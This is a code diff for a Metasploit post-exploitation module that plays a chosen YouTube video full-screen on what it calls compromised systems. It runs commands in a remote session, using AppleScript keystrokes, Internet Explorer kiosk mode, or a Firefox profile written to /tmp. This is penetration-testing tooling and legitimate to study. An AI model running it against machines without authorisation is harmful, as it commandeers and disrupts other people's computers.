Add the EMBED option for play_youtube.rb

modules/post/multi/manage/play_youtube.rb

@@ -6,37 +6,53 @@
 class MetasploitModule < Msf::Post
   include Msf::Post::File
 
-  PLAY_OPTIONS = 'autoplay=1&loop=1&disablekb=1&modestbranding=1&iv_load_policy=3&controls=0&showinfo=0&rel=0'
-
   def initialize(info={})
     super( update_info( info,
       'Name'          => 'Multi Manage YouTube Broadcast',
       'Description'   => %q{
         This module will broadcast a YouTube video on specified compromised systems. It will play
-        the video in the target machine's native browser in full screen mode. The VID datastore
+        the video in the target machine's native browser. The VID datastore option is the "v"
-        option is the "v" parameter in a YouTube video's URL.
+        parameter in a YouTube video's URL.
+
+        Enabling the EMBED option will play the video in full screen mode through a clean interface
+        but is not compatible with all videos.
+
+        This module will create a custom profile for Firefox on Linux systems in the /tmp directory.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'sinn3r'],
+      'Author'        => [ 'sinn3r' ],
       'Platform'      => [ 'win', 'osx', 'linux', 'android' ],
-      'SessionTypes'  => [ 'shell', 'meterpreter' ]
+      'SessionTypes'  => [ 'shell', 'meterpreter' ],
+      'Notes'         =>
+        {
+          # ARTIFACTS_ON_DISK when the platform is linux
+          'SideEffects' => [ ARTIFACTS_ON_DISK, AUDIO_EFFECTS, SCREEN_EFFECTS ]
+        },
     ))
 
     register_options(
       [
+        OptBool.new('EMBED', [true, 'Use the embed version of the YouTube URL', true]),
         OptString.new('VID', [true, 'The video ID to the YouTube video'])
       ])
   end
 
-  YOUTUBE_BASE_URL = "https://youtube.com/embed/"
+  
+
+  def youtube_url
+    if datastore['EMBED']
+      "https://youtube.com/embed/#{datastore['VID']}?autoplay=1&loop=1&disablekb=1&modestbranding=1&iv_load_policy=3&controls=0&showinfo=0&rel=0"
+    else
+      "https://youtube.com/watch?v=#{datastore['VID']}"
+    end
+  end
 
   #
   # The OSX version uses an apple script to do this
   #
   def osx_start_video(id)
-    url = "#{YOUTUBE_BASE_URL}#{id}?#{PLAY_OPTIONS}"
     script = ''
-    script << %Q|osascript -e 'tell application "Safari" to open location "#{url}"' |
+    script << %Q|osascript -e 'tell application "Safari" to open location "#{youtube_url}"' |
     script << %Q|-e 'activate application "Safari"' |
     script << %Q|-e 'tell application "System Events" to key code {59, 55, 3}'|
 
@@ -55,7 +71,7 @@ class MetasploitModule < Msf::Post
   def win_start_video(id)
     iexplore_path = "C:\\Program Files\\Internet Explorer\\iexplore.exe"
     begin
-      session.sys.process.execute(iexplore_path, "-k #{YOUTUBE_BASE_URL}#{id}?#{PLAY_OPTIONS}")
+      session.sys.process.execute(iexplore_path, "-k #{youtube_url}")
     rescue Rex::Post::Meterpreter::RequestError
       return false
     end
@@ -73,6 +89,7 @@ class MetasploitModule < Msf::Post
       # Create a profile
       profile_name = Rex::Text.rand_text_alpha(8)
       display = get_env('DISPLAY') || ':0'
+      vprint_status("Creating profile #{profile_name} using display #{display}")
       o = cmd_exec(%Q|firefox --display #{display} -CreateProfile "#{profile_name} /tmp/#{profile_name}"|)
 
       # Add user-defined settings to profile
@@ -83,8 +100,7 @@ class MetasploitModule < Msf::Post
       write_file("/tmp/#{profile_name}/prefs.js", s)
 
       # Start the video
-      url = "#{YOUTUBE_BASE_URL}#{id}?#{PLAY_OPTIONS}"
+      data_js = %Q|"data:text/html,<script>window.open('#{youtube_url}','','width:100000px;height:100000px');</script>"|
-      data_js = %Q|"data:text/html,<script>window.open('#{url}','','width:100000px;height:100000px');</script>"|
       joe = "firefox --display #{display} -p #{profile_name} #{data_js} &"
       cmd_exec("/bin/sh -c #{joe.shellescape}")
     rescue EOFError